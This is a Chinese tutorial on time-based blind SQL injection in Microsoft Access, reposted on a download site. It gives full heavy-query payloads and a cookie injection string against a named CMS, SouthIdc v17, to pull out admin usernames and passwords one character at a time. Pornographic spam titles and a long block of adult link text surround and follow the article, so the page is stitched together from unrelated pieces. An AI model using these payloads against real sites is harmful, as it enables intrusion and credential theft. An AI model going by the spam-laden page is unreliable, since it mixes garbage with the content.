国产午夜成人免费看片无遮挡_日本免费xxxx色视频_免费人成网上在线观看_黄网址在线永久免费观看

當前位置:雨林木風下載站 > 辦公軟件教程 > 詳細頁面

Access數據庫基于時間sql盲注的完成記錄

Access數據庫基于時間sql盲注的完成記錄

更新時間:2022-05-07 文章作者:未知 信息來源:網絡 閱讀次數:

Microsoft Office Access是由微軟發布的關系數據庫管理系統。它結合了 MicrosoftJet Database Engine 和 圖形用戶界面兩項特點,是 Microsoft Office 的系統程序之一。Microsoft Office Access是微軟把數據庫引擎的圖形用戶界面和軟件開發工具結合在一起的一個數據庫管理系統。它是微軟OFFICE的一個成員, 在包括專業版和更高版本的office版本里面被單獨出售。2018年9月25日,最新的微軟Office Access 2019在微軟Office 2019里發布。

   Access是微軟把數據庫引擎的圖形用戶界面和軟件開發工具結合在一起的一個數據庫管理系統。本文我們來看看Access數據庫基于時間sql盲注的實現記錄。

  概述

  眾所周知,access數據庫是不支持基于時間的盲注方式,但是我們可以利用access的系統表MSysAccessObjects,通過多負荷查詢(Heavy Queries)的方式實現。

  初步探究

  我們以SouthIdcv17數據庫為例

  執行 select * from Southidc_About ,返回結果如下圖。

Access數據庫基于時間sql盲注的實現記錄    三聯

  如何實現time base injection 呢?我們就要利用這條語句

  SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12

  具體實現方式如下:

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=97

  我們可以執行一次,觀察效果。

  很明顯,經歷了大約40s才返回結果

Access數據庫基于時間sql盲注的實現記錄

  當我們執行如下語句時,也就是把最后的97改為96

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=96

Access數據庫基于時間sql盲注的實現記錄

  很快就執行完畢,沒有延時。

  很明顯,我們通過where條件后的

  (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0

  實現了延時,但需要注意的是這里where后的條件是有順序的,實現延時的語句必須在

  1(select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97

  之前,為什么呢?實驗得出的結論。

  實例實現

  在SouthIdc 17 中,有一處sql注入漏洞,但是常規的方法并不能成功利用漏洞。漏洞代碼如下:

Access數據庫基于時間sql盲注的實現記錄

  雖然程序把Post和Get的數據進行了過濾,但是我們依舊我可以通過Cookie的提交方式進行注入。

  好,我們實現一下注入利用。

  我們需要注入的語句為:

  select * from Southidc_"&request("Range")&"Sort where ViewFlag and ParentID="&ParentID&" order by ID asc

  通過提交cookie

  Range=DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image

  ParentID為程序上部傳進的值,最終的語句為:

  1select * from Southidc_DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_imageSort where ViewFlag and ParentID=1

  我們可以在查詢器中看一下效果

  96時,不延時,如圖:

Access數據庫基于時間sql盲注的實現記錄

  97時延時,效果如下圖:

Access數據庫基于時間sql盲注的實現記錄

  接下來,我們可以利用上述語句進行exp的編寫,筆者這里用python

  核心代碼如下:

Access數據庫基于時間sql盲注的實現記錄

Microsoft Access在很多地方得到廣泛使用,例如小型企業,大公司的部門。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

国产午夜成人免费看片无遮挡_日本免费xxxx色视频_免费人成网上在线观看_黄网址在线永久免费观看

  • <label id="pxtpz"><meter id="pxtpz"></meter></label>
      1. <span id="pxtpz"><optgroup id="pxtpz"></optgroup></span>

        91看片淫黄大片一级在线观看| 久久精品国产精品亚洲精品 | 国产真实乱偷精品视频免| 欧美性色欧美a在线播放| 午夜精品123| 欧美成人猛片aaaaaaa| 九一久久久久久| 国产女主播视频一区二区| 成人精品鲁一区一区二区| 亚洲精品国产第一综合99久久 | 婷婷国产在线综合| 日韩免费高清视频| 懂色av中文字幕一区二区三区 | 亚洲一级二级三级| 91精品国产福利在线观看| 国产原创一区二区三区| 亚洲精品中文在线观看| 欧美精品免费视频| 国产精选一区二区三区| 亚洲一区av在线| 久久久精品国产99久久精品芒果| youjizz久久| 蜜桃在线一区二区三区| 综合色中文字幕| 久久女同互慰一区二区三区| 日本黄色一区二区| 国产成人啪免费观看软件| 日韩精品一二三区| 国产精品久久夜| 精品区一区二区| 欧美精品777| 色偷偷久久一区二区三区| 国产成人精品亚洲午夜麻豆| 蜜桃精品在线观看| 亚洲永久精品国产| 亚洲欧美一区二区三区孕妇| 久久无码av三级| 日韩久久免费av| 在线免费观看日本欧美| 国产美女精品一区二区三区| 免费观看久久久4p| 亚洲国产三级在线| 亚洲美腿欧美偷拍| 国产精品久久久久久久久久免费看 | 亚洲r级在线视频| 国产精品你懂的在线欣赏| 欧美大片国产精品| 777奇米成人网| 欧美精品久久一区| 欧美日本在线播放| 欧美精品在线一区二区| 日本二三区不卡| 91福利在线免费观看| 91污片在线观看| 97久久精品人人做人人爽| 成人性生交大片| aaa亚洲精品| 99国产麻豆精品| 91一区在线观看| 久久综合一区二区| 美脚の诱脚舐め脚责91| 成人午夜视频福利| 天堂精品中文字幕在线| 亚洲一区影音先锋| 亚洲国产色一区| 日韩精品91亚洲二区在线观看| 亚洲第一主播视频| 日韩1区2区日韩1区2区| 日本女人一区二区三区| 激情综合五月天| 不卡的av电影| 91理论电影在线观看| 欧美色综合影院| 日韩免费一区二区| 国产午夜精品一区二区三区视频| 久久精品这里都是精品| 亚洲手机成人高清视频| 亚洲成a人在线观看| 亚洲美女免费视频| 日韩一区二区三区免费看| 日韩不卡在线观看日韩不卡视频| 日韩手机在线导航| 91精品久久久久久久久99蜜臂| 日韩一区二区三区免费看 | 亚洲国产成人av好男人在线观看| 亚洲狠狠爱一区二区三区| 无码av中文一区二区三区桃花岛| 天天影视涩香欲综合网| 久久成人免费网站| 91看片淫黄大片一级在线观看| 日韩一区二区三区精品视频| 国产精品久久午夜夜伦鲁鲁| 日本伊人精品一区二区三区观看方式| 欧美日韩国产在线观看| 日韩精品一区二| 亚洲丝袜另类动漫二区| 日本不卡中文字幕| 成人激情黄色小说| 91精品久久久久久蜜臀| 亚洲免费av高清| 国产69精品久久99不卡| 欧美一卡在线观看| 亚洲一区二区免费视频| 国产91对白在线观看九色| 欧美一区二区久久| 亚洲成a人v欧美综合天堂下载| 懂色av一区二区三区免费看| 欧美一区二区精品在线| 亚洲国产另类av| 一本久道久久综合中文字幕| 国产亚洲1区2区3区| 美女精品自拍一二三四| 欧美日韩国产综合视频在线观看 | 婷婷一区二区三区| av色综合久久天堂av综合| 亚洲精品在线电影| 欧美a级理论片| 欧美日韩精品三区| 亚洲国产精品久久艾草纯爱| 色欧美片视频在线观看在线视频| 欧美韩国日本不卡| 国产一区二区三区精品视频| 538在线一区二区精品国产| 亚洲成年人影院| 在线不卡欧美精品一区二区三区| 亚洲主播在线播放| 日本韩国精品一区二区在线观看| 国产精品不卡在线| 91丨九色丨尤物| 亚洲欧美韩国综合色| 99久久综合狠狠综合久久| 国产精品国产自产拍高清av王其| 国产在线播放一区| www久久精品| 国产成人精品亚洲777人妖 | 久久女同互慰一区二区三区| 九九热在线视频观看这里只有精品| 欧美精品丝袜久久久中文字幕| 日韩精品午夜视频| 欧美电影免费观看高清完整版| 国产在线精品一区二区夜色| 国产性天天综合网| 99久久精品国产一区二区三区 | 99久久婷婷国产综合精品| 中文字幕亚洲在| 在线日韩av片| 天涯成人国产亚洲精品一区av| 日韩美女天天操| 成人美女视频在线观看18| 日韩伦理电影网| 欧美日韩大陆在线| 久久99精品久久久久久久久久久久| 久久久久国产免费免费| 99热在这里有精品免费| 日韩精品高清不卡| 国产精品美女久久久久aⅴ国产馆 国产精品美女久久久久av爽李琼 国产精品美女久久久久高潮 | 国产午夜精品一区二区三区视频 | 久久草av在线| 国产精品久久久久影院老司| 欧美色成人综合| 国产91对白在线观看九色| 一区二区激情小说| 精品久久人人做人人爽| 91蜜桃免费观看视频| 精品制服美女久久| 亚洲精品国产一区二区精华液 | 91麻豆精品国产91久久久资源速度| 久久国产精品99精品国产| 久久久91精品国产一区二区精品| 色诱视频网站一区| 久久精品国产色蜜蜜麻豆| 亚洲欧洲日产国产综合网| 日韩无一区二区| 在线观看亚洲成人| 国产精品一级片| 亚洲成a人v欧美综合天堂下载 | 91美女在线看| 精品写真视频在线观看| 亚洲黄色性网站| 国产天堂亚洲国产碰碰| 日韩一区二区影院| 欧美三级视频在线| 91视频www| 成人影视亚洲图片在线| 久久av中文字幕片| 性做久久久久久久免费看| 亚洲欧洲www| 亚洲国产激情av| 久久精品亚洲麻豆av一区二区 | 国产成人av电影在线播放| 日本亚洲三级在线| 亚洲一区免费视频| 亚洲最新视频在线播放| 最新日韩在线视频| 中文字幕精品三区| 国产精品国产三级国产aⅴ入口 | 另类专区欧美蜜桃臀第一页| 天堂精品中文字幕在线| 午夜精品免费在线观看| 亚洲国产视频网站|